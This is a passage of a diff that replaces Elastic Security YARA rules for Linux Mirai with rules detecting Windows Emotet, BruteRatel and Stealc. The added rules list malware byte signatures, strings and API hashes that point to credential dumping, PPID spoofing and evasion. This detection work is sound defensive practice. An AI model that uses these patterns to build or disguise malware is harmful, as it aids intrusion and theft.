0C 40 C1 EA ?? 48 03 C9 66 89 54 CB ?? 8B 43 ?? 0F B7 95 ?? ?? ?? ?? 48 8D 0C 40 B8 ?? ?? ?? ?? 48 03 C9 89 54 CB ?? FF 43 ?? } + $c2_list_4 = { 8B 43 ?? 48 FF C0 48 8D 0C 40 8B 44 24 ?? 89 04 CB 8B 43 ?? 8B 54 24 ?? 48 8D 0C 40 C1 EA ?? 66 89 54 CB ?? 8B 43 ?? 0F B7 54 24 ?? 48 8D 0C 40 89 54 CB ?? FF 43 ?? } + $c2_list_5 = { 8B 83 ?? ?? ?? ?? 48 8D 0C 80 8B 44 24 ?? 89 44 CB ?? 8B 83 ?? ?? ?? ?? 8B 54 24 ?? 48 8D 0C 80 C1 EA ?? 66 89 54 CB ?? 8B 83 ?? ?? ?? ?? 0F B7 54 24 ?? 48 8D 0C 80 89 14 CB FF 83 ?? ?? ?? ?? } + $c2_list_a = { 8B 83 ?? ?? ?? ?? 83 F8 ?? 73 ?? 48 8D 4C 24 ?? FF 54 C4 ?? 83 7C 24 ?? ?? 74 ?? 83 7C 24 ?? ?? 74 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? } + $string_w_1 = { 8B 0B 49 FF C3 48 8D 5B ?? 33 CD 0F B6 C1 66 41 89 00 0F B7 C1 C1 E9 ?? 66 C1 E8 ?? 4D 8D 40 ?? 66 41 89 40 ?? 0F B6 C1 66 C1 E9 ?? 66 41 89 40 ?? 66 41 89 48 ?? 4D 3B D9 72 ?? } + $string_w_2 = { 8B CD 49 FF C3 33 0B 48 8D 5B ?? 0F B6 C1 66 41 89 00 0F B7 C1 C1 E9 ?? 66 C1 E8 ?? 4D 8D 40 ?? 66 41 89 40 ?? 0F B6 C1 66 C1 E9 ?? 66 41 89 40 ?? 66 41 89 48 ?? 4D 3B D9 72 ?? } + $string_a_1 = { 8B 0B 49 FF C3 48 8D 5B ?? 33 CD 41 88 08 0F B7 C1 C1 E9 ?? 66 C1 E8 ?? 4D 8D 40 ?? 41 88 40 ?? 41 88 48 ?? 66 C1 E9 ?? 41 88 48 ?? 4D 3B D9 72 ?? } + $key_1 = { 45 33 C9 4C 8B D0 48 85 C0 74 ?? 48 8D ?? ?? 4C 8B ?? 48 8B ?? 48 2B ?? 48 83 ?? ?? 48 C1 ?? ?? 48 3B ?? 49 0F 47 ?? 48 85 ?? 74 ?? 48 2B D8 42 8B 04 03 } condition: - all of them + (1 of ($string_*)) and (($key_1 or (1 of ($c2_list*))) or (1 of ($c2_list*))) } -rule ELASTIC_Linux_Trojan_Mirai_7C88Acbc : FILE MEMORY +rule ELASTIC_Windows_Trojan_Emotet_8B9449C1 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Emotet (Windows.Trojan.Emotet)" author = "Elastic Security" - id = "7c88acbc-8b98-4508-ac53-ab8af858660d" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L279-L296" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "76373f8e09b7467ac5d36e8baad3025a57568e891434297e53f2629a72cf8929" + id = "8b9449c1-41a3-4f4d-b654-6921f2742b9a" + date = "2022-11-09" + modified = "2022-12-20" + reference = "https://www.elastic.co/security-labs/emotet-dynamic-configuration-extraction" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Emotet.yar#L146-L166" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ffac0120c3ae022b807559e8ed7902fde0fa5f7cb9c5c8d612754fa498288572" + logic_hash = "5501354ebc1d97fe5ce894d5907adb29440f557f2dd235e1e983ae2d109199a2" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e2ef1c60e21f18e54694bcfc874094a941e5f61fa6144c5a0e44548dafa315be" + fingerprint = "ff15cec5eb41bb9637b570d717151cdc076e88a7b4c3d1c31157d41fe7569318" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = "[Cobalt][%s][%s][%s][%s]" + $hash_1 = { 8B CB 41 8B D0 D3 E2 41 8B CB D3 E0 03 D0 41 0F BE ?? 03 D0 41 2B D0 49 FF ( C1 | C2 ) } + $hash_2 = { 44 8B ?? 44 8B ?? 41 8B CB 41 D3 ?? 8B CB D3 E0 8B C8 8D 42 ?? 66 83 F8 ?? 0F B7 C2 77 ?? 83 C0 ?? 41 2B ?? 41 03 ?? 03 C1 49 83 ?? ?? 41 0F B7 } condition: - all of them + any of them } -rule ELASTIC_Linux_Trojan_Mirai_804F8E7C : FILE MEMORY +rule ELASTIC_Windows_Trojan_Bruteratel_1916686D : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Bruteratel (Windows.Trojan.BruteRatel)" author = "Elastic Security" - id = "804f8e7c-4786-42bc-92e4-c68c24ca530e" - date = "2021-01-12" - modified = "2021-09-16" + id = "1916686d-4821-4e5a-8290-58336d01997f" + date = "2022-06-23" + modified = "2022-12-01" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L298-L316" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6" - logic_hash = "711d74406d9b0d658b3b29f647bd659699ac0af9cd482403122124ec6054f1ec" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_BruteRatel.yar#L1-L31" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "e0e7b8ba2865fc76845b21aa3e075ceab98888635a60bd722c0c81e0f4fcf58c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6" + fingerprint = "86304082d3eda2f160465f0af0a3feae1aa9695727520e51f139d951e50d6efc" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 31 ED 81 E1 FF 00 00 00 89 4C 24 58 89 EA C6 46 04 00 C1 FA 1F } + $a1 = "[+] Spoofed PPID => %lu" wide fullword + $a2 = "[-] Child process not set" wide fullword + $a3 = "[+] Crisis Monitor: Already Running" wide fullword + $a4 = "[+] Screenshot downloaded: %S" wide fullword + $a5 = "s[-] Duplicate listener: %S" wide fullword + $a6 = "%02d%02d%d_%02d%02d%2d%02d.png" wide fullword + $a7 = "[+] Added Socks Profile" wide fullword + $a8 = "[+] Dump Size: %d Mb" wide fullword + $a9 = "[+] Enumerating PID: %lu [%ls]" wide fullword + $a10 = "[+] Dump Size: %d Mb" wide fullword + $a11 = "[+] SAM key: " wide fullword + $a12 = "[+] Token removed: '%ls'" wide fullword + $a13 = "[Tasks] %02d => 0x%02X 0x%02X" wide fullword + $b1 = { 48 83 EC ?? 48 8D 35 ?? ?? ?? ?? 4C 63 E2 31 D2 48 8D 7C 24 ?? 48 89 CB 4D 89 E0 4C 89 E5 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 A4 31 F6 BF ?? ?? ?? ?? 39 F5 7E ?? E8 ?? ?? ?? ?? 99 F7 FF 48 63 D2 8A 44 14 ?? 88 04 33 48 FF C6 EB ?? } condition: - all of them + 4 of ($a*) or 1 of ($b*) } -rule ELASTIC_Linux_Trojan_Mirai_A2D2E15A : FILE MEMORY +rule ELASTIC_Windows_Trojan_Bruteratel_9B267F96 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Bruteratel (Windows.Trojan.BruteRatel)" author = "Elastic Security" - id = "a2d2e15a-a2eb-43c6-a43d-094ee9739749" - date = "2021-01-12" - modified = "2021-09-16" + id = "9b267f96-11b3-48e6-9d38-ecfd72cb7e3e" + date = "2022-06-23" + modified = "2022-07-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L318-L336" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "567c3ce9bbbda760be81c286bfb2252418f551a64ba1189f6c0ec8ec059cee49" - logic_hash = "c76fe953c4a70110346a020f2b27c7e79f4ad8a24fd92ac26e5ddd1fed068f65" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_BruteRatel.yar#L33-L57" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "fbaaf4bf2462119b39a5df90b91fb831be3e602b926cd893374a5dddf48f029d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0e57d17f5c0cd876248a32d4c9cbe69b5103899af36e72e4ec3119fa48e68de2" + fingerprint = "f20cbaf39dc68460a2612298a5df9efdf5bdb152159d38f4696aedf35862bbb6" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 42 F0 41 83 F8 01 76 5F 44 0F B7 41 10 4C 01 C0 44 8D 42 EE 41 83 } + $a1 = "calAllocPH" ascii fullword + $a2 = "lizeCritPH" ascii fullword + $a3 = "BadgerPH" ascii fullword + $a4 = "VirtualPPH" ascii fullword + $a5 = "TerminatPH" ascii fullword + $a6 = "ickCountPH" ascii fullword + $a7 = "SeDebugPH" ascii fullword + $b1 = { 50 48 B8 E2 6A 15 64 56 22 0D 7E 50 48 B8 18 2C 05 7F BB 78 D7 27 50 48 B8 C9 EC BC 3D 84 54 9A 62 50 48 B8 A1 E1 3C 4E AF 2B F6 B1 50 48 B8 2E E6 7B A0 94 CA 9D F0 50 48 B8 61 52 80 AA 1A B6 4B 0E 50 48 B8 B2 13 11 5A 28 81 ED 60 50 48 B8 20 DE A9 34 89 08 C8 32 50 48 B8 9B DC C1 FF 79 CE 5B F5 50 48 B8 FD 57 3F 4C C7 D3 7A 21 50 48 B8 70 B8 63 0F AB 19 BF 1C 50 48 B8 48 F2 1B 72 1E 2A C6 8A 50 48 B8 E3 FA 38 E9 1D 76 E0 6F 50 48 B8 97 AD 75 } condition: - all of them + 3 of ($a*) or 1 of ($b*) } -rule ELASTIC_Linux_Trojan_Mirai_5946F41B : FILE MEMORY +rule ELASTIC_Windows_Trojan_Bruteratel_684A39F2 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Bruteratel (Windows.Trojan.BruteRatel)" author = "Elastic Security" - id = "5946f41b-594c-4fde-827c-616a99f6fc1b" - date = "2021-01-12" - modified = "2021-09-16" + id = "684a39f2-a110-4553-8d29-9f742e0ca3dc" + date = "2023-01-24" + modified = "2023-02-01" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L338-L356" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f0b6bf8a683f8692973ea8291129c9764269a6739650ec3f9ee50d222df0a38a" - logic_hash = "43691675db419426413ccc24aa9dfe94456fa1007630652b08a625eafd1f17b8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_BruteRatel.yar#L59-L84" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5f4782a34368bb661f413f33e2d1fb9f237b7f9637f2c0c21dc752316b02350c" + logic_hash = "7cb74176e1dbdd248295649568d29c9d88841fcd0c16479b6b7efc71c4a1d706" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f28b9b311296fc587eced94ca0d80fc60ee22344e5c38520ab161d9f1273e328" + fingerprint = "fef288db141810b01f248a476368946c478a395b1709a982e2f740dd011c6328" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 59 08 AA 3A 4C D3 6C 2E 6E F7 24 54 32 7C 61 39 65 21 66 74 } + $seq1 = { 39 DA 0F 82 61 02 00 00 45 8D 48 14 44 39 CA 0F 82 54 02 00 00 41 8D 40 07 46 0F B6 0C 09 44 0F B6 1C 01 42 0F B6 04 11 41 C1 E3 08 41 09 C3 } + $seq2 = { 45 8A 44 13 F0 44 32 04 01 48 FF C0 45 88 04 13 48 FF C2 48 83 F8 04 75 E7 49 83 C2 04 48 83 C6 04 49 81 FA B0 00 00 00 75 AA 48 83 C4 38 5B 5E C3 } + $seq3 = { 48 83 EC 18 8A 01 88 04 24 8A 41 05 88 44 24 01 8A 41 0A 88 44 24 02 8A 41 0F 88 44 24 03 8A 41 04 88 44 24 04 8A 41 09 88 44 24 05 8A 41 0E 88 44 24 06 8A 41 03 88 44 24 07 } + $seq4 = { 42 8A 0C 22 8D 42 ?? 80 F9 ?? 75 ?? 48 98 4C 89 E9 48 29 C1 42 8A 14 20 80 FA ?? 74 ?? 88 14 01 48 FF C0 EB ?? } + $cfg1 = { 22 00 2C 00 22 00 61 00 72 00 63 00 68 00 22 00 3A 00 22 00 78 00 36 00 34 00 22 00 2C 00 22 00 62 00 6C 00 64 00 22 00 3A 00 22 00 } + $cfg2 = { 22 00 2C 00 22 00 77 00 76 00 65 00 72 00 22 00 3A 00 22 00 } + $cfg3 = { 22 00 2C 00 22 00 70 00 69 00 64 00 22 00 3A 00 22 00 } + $cfg4 = { 22 00 7D 00 2C 00 22 00 6D 00 74 00 64 00 74 00 22 00 3A 00 7B 00 22 00 68 00 5F 00 6E 00 61 00 6D 00 65 00 22 00 3A 00 22 00 } condition: - all of them + any of ($seq*) and all of ($cfg*) } -rule ELASTIC_Linux_Trojan_Mirai_Da4Aa3B3 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Bruteratel_Ade6C9D5 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Targets API hashes used by BruteRatel" author = "Elastic Security" - id = "da4aa3b3-521d-4fde-b1be-c381d28c701c" - date = "2021-01-12" - modified = "2021-09-16" + id = "ade6c9d5-e9b5-4ef8-bacd-2f050c25f7f6" + date = "2023-01-24" + modified = "2023-02-01" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L358-L376" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "dbc246032d432318f23a4c1e5b6fcd787df29da3bf418613f588f758dcd80617" - logic_hash = "84ddc505d2e2be955b88a0fe3b78d435f73c0a315b513e105933e84be78ba2ad" - score = 75 - quality = 75 + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_BruteRatel.yar#L86-L109" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "dc9757c9aa3aff76d86f9f23a3d20a817e48ca3d7294307cc67477177af5c0d4" + logic_hash = "8ff8ed1e2b909606fe6aae3f43ad02898d7b3906c3d329a508f6d40490ec75a0" + score = 60 + quality = 45 tags = "FILE, MEMORY" - fingerprint = "8b004abc37f47de6e4ed35284c23db0f6617eec037a71ce92c10aa8efc3bdca5" + fingerprint = "9a4c5660eeb9158652561cf120e91ea5887841ed71f69e7cf4bfe4cfb11fe74a" + threat_name = "Windows.Trojan.BruteRatel" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 01 D0 C1 E0 03 89 C2 8B 45 A0 01 D0 0F B6 40 14 3C 1F 77 65 8B } + $c1_NtReadVirtualMemory = { AA A5 EF 3A } + $c2_NtQuerySystemInformation = { D6 CA E1 E4 } + $c3_NtCreateFile = { 9D 8F 88 03 } + $c4_RtlSetCurrentTranscation = { 90 85 A3 99 } + $c5_LoadLibrary = { 8E 4E 0E EC } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_70Ef58F1 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Bruteratel_4110D879 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Bruteratel (Windows.Trojan.BruteRatel)" author = "Elastic Security" - id = "70ef58f1-ac74-4e33-ae03-e68d1d5a4379" - date = "2021-01-12" - modified = "2021-09-16" + id = "4110d879-8d36-4004-858d-e62400948920" + date = "2023-05-10" + modified = "2023-06-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L378-L396" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fc8741f67f39e7409ab2c6c62d4f9acdd168d3e53cf6976dd87501833771cacb" - logic_hash = "3ad201d643e8f93a6f9075c03a76020d78186702a19bf9174b08688a2e94ef5c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_BruteRatel.yar#L111-L130" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e0fbbc548fdb9da83a72ddc1040463e37ab6b8b544bf0d2b206bfff352175afe" + logic_hash = "22c27523ddd8183c41da40f7ff908ae5bdee3b482c8a3f70aaa63a4c419e515b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "c46eac9185e5f396456004d1e0c42b54a9318e0450f797c55703122cfb8fea89" + fingerprint = "64d7a121961108d17e03fa767bd5bc194c8654dfa18b3b2f38cf6c95a711f794" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 89 D0 8B 19 01 D8 0F B6 5C 24 10 30 18 89 D0 8B 19 01 D8 0F B6 5C } + $a1 = { 04 01 75 E2 48 83 C0 01 44 0F B6 04 02 45 84 C0 75 EC 48 89 } + $a2 = { C8 48 83 E9 20 44 0F B6 40 E0 41 80 F8 E9 74 0B 44 0F B6 49 03 41 80 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_Ea584243 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Bruteratel_5B12Cbab : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Bruteratel (Windows.Trojan.BruteRatel)" author = "Elastic Security" - id = "ea584243-6ead-4b96-9a5c-5b5dee12fd57" - date = "2021-01-12" - modified = "2021-09-16" + id = "5b12cbab-c64c-4895-a186-b940bf4a8620" + date = "2024-02-21" + modified = "2024-03-21" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L398-L416" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f363d9bd2132d969cd41e79f29c53ef403da64ca8afc4643084cc50076ddfb47" - logic_hash = "34c6f800c849c295797cdd971fb4f3d16d680530f9a98c291388345569708208" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_BruteRatel.yar#L132-L150" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8165798fec8294523f25aedfc6699faad0c5d75f60bc7cefcbb2fa13dbc656e3" + logic_hash = "b86296dafaef1dfa0a41704cafa351694abb0e453e104dfe06836ed599338f38" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "cbcabf4cba48152b3599570ef84503bfb8486db022a2b10df7544d4384023355" + fingerprint = "33e4c8fa032f33bec4719707d3ddcfa5103b747d9be70fa41848fdafd254c0ac" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 01 00 00 0E 00 00 00 18 03 00 7F E9 38 32 C9 4D 04 9A 3C 81 FA } + $a = { 48 81 EC 00 01 00 00 31 C0 41 89 D3 48 89 E3 88 04 18 48 FF C0 48 3D 00 01 00 00 75 F2 45 31 D2 31 FF 44 89 D0 42 8A 34 13 99 41 F7 FB 48 63 D2 8A 04 11 01 F0 01 F8 0F B6 F8 0F B6 C0 8A 14 04 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_564B8Eda : FILE MEMORY +rule ELASTIC_Windows_Trojan_Bruteratel_5E383Ae0 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Bruteratel (Windows.Trojan.BruteRatel)" author = "Elastic Security" - id = "564b8eda-6f0e-45b8-bef6-d61b0f090a36" - date = "2021-01-12" - modified = "2021-09-16" + id = "5e383ae0-c379-4a8b-938e-943fb1f3fd06" + date = "2024-03-27" + modified = "2024-05-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L418-L436" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ff04921d7bf9ca01ae33a9fc0743dce9ca250e42a33547c5665b1c9a0b5260ee" - logic_hash = "4bf11492f480911629623250146554f2456f3a527f5f80402ef74b22c1460462" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_BruteRatel.yar#L152-L184" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0b506ef32f58ee2b1e5701ca8e13c67584739ab1d00ee4a0c2f532c09a15836f" + logic_hash = "5d87ada1c609e23742c389f8153a9266c4db95be4a5e10b50979aebc993a45e0" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "63a9e43902e7db0b7a20498b5a860e36201bacc407e9e336faca0b7cfbc37819" + fingerprint = "4a32b644ae97dfefa8766aa86cd519733ca2827a4a24d6ba5d9ac650a3559abc" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 83 FE 01 76 12 0F B7 07 83 EE 02 48 83 C7 02 48 01 C1 83 FE 01 } + $a1 = "_imp_BadgerWcslen" + $a2 = "_imp_BadgerStrcmp" + $a3 = "_imp_BadgerDispatch" + $a4 = "_imp_BadgerStrlen" + $a5 = "_imp_BadgerMemset" + $a6 = "_imp_BadgerMemcpy" + $a7 = "_imp_BadgerWcscmp" + $a8 = "_imp_BadgerAlloc" + $a9 = "_imp_BadgerFree" + $a10 = "_imp_BadgerSetdebug" + $a11 = "_imp_BadgerGetBufferSize" + $b1 = "__imp_Kernel32$" + $b2 = "__imp_Ntdll$Nt" + $b3 = "__imp_Advapi32$" + $b4 = "__imp_NETAPI32$" condition: - all of them + 1 of ($a*) and 1 of ($b*) } -rule ELASTIC_Linux_Trojan_Mirai_7E9F85Fb : FILE MEMORY +rule ELASTIC_Windows_Trojan_Bruteratel_644Ac114 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Bruteratel (Windows.Trojan.BruteRatel)" author = "Elastic Security" - id = "7e9f85fb-bfc4-4af6-9315-f6e43fefc4ff" - date = "2021-01-12" - modified = "2021-09-16" + id = "644ac114-cc66-443e-9dd0-a591be99a86c" + date = "2024-04-17" + modified = "2024-05-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L438-L456" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4333e80fd311b28c948bab7fb3f5efb40adda766f1ea4bed96a8db5fe0d80ea1" - logic_hash = "f4ce912e190bc5dcb56541f54ba8e47b6103c482bdc7e83b44693d2c066c0170" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_BruteRatel.yar#L186-L205" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ace6a99d95ef859d4ab74db6900753e754273a12a34721f1aa8f1a9df3d8ec35" + logic_hash = "06ffea16a0348f2276f379db150b5f9d2dbdffbcb2eee83c55c27c837ecb1e69" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ef420ec934e3fd07d5c154a727ed5c4689648eb9ccef494056fed1dea7aa5f9c" + fingerprint = "471b2e5f0ae2a08accb90c602af5e892afc1f2a140b25db977df610123cf60be" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 85 50 FF FF FF 0F B6 40 04 3C 07 75 79 48 8B 85 50 FF FF FF } + $a = { 80 39 0F 75 ?? 80 79 01 05 75 ?? 80 79 02 C3 75 ?? 48 89 C8 C3 } + $b = { 80 79 01 8B 75 ?? 80 79 02 D1 75 ?? 41 80 F9 B8 75 ?? 80 79 06 00 75 ?? 0F B6 41 05 C1 E0 08 41 89 C0 0F B6 41 04 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_3A85A418 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Stealc_B8Ab9Ab5 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Stealc (Windows.Trojan.Stealc)" author = "Elastic Security" - id = "3a85a418-2bd9-445a-86cb-657ca7edf566" - date = "2021-01-12" - modified = "2021-09-16" + id = "b8ab9ab5-5731-4651-b982-03ad8fe347fb" + date = "2024-03-13" + modified = "2024-03-21" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L458-L476" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "86a43b39b157f47ab12e9dc1013b4eec0e1792092d4cef2772a21a9bf4fc518a" - logic_hash = "bd7fe497fb2557c9e9c26ec90e783f03cbbc9bdaa8d20b364ce65edf6c1e5fa3" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Stealc.yar#L1-L27" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0d1c07c84c54348db1637e21260dbed09bd6b7e675ef58e003d0fe8f017fd2c8" + logic_hash = "5fc5d5cea481d1d204d1aa6c52679a23eb59438df2fe547d14c00524772867bb" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "554aff5770bfe8fdeae94f5f5a0fd7f7786340a95633433d8e686af1c25b8cec" + fingerprint = "49253b1d1e39ba25b2d3b622d00633b9629715e65e1537071b0f3b0318b7db12" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 01 D8 66 C1 C8 08 C1 C8 10 66 C1 C8 08 66 83 7C 24 2C FF 89 } + $seq_str_decrypt = { 55 8B EC 83 EC ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 C0 ?? 50 } + $seq_lang_check = { 81 E9 19 04 00 00 89 4D ?? 83 7D ?? ?? 77 ?? 8B 55 ?? 0F B6 82 ?? ?? ?? ?? FF 24 85 ?? ?? ?? ?? } + $seq_mem_check_constant = { 72 09 81 7D F8 57 04 00 00 73 08 } + $seq_hwid_algo = { 8B 08 69 C9 0B A3 14 00 81 E9 51 75 42 69 8B 55 08 } + $str1 = "- Country: ISO?" 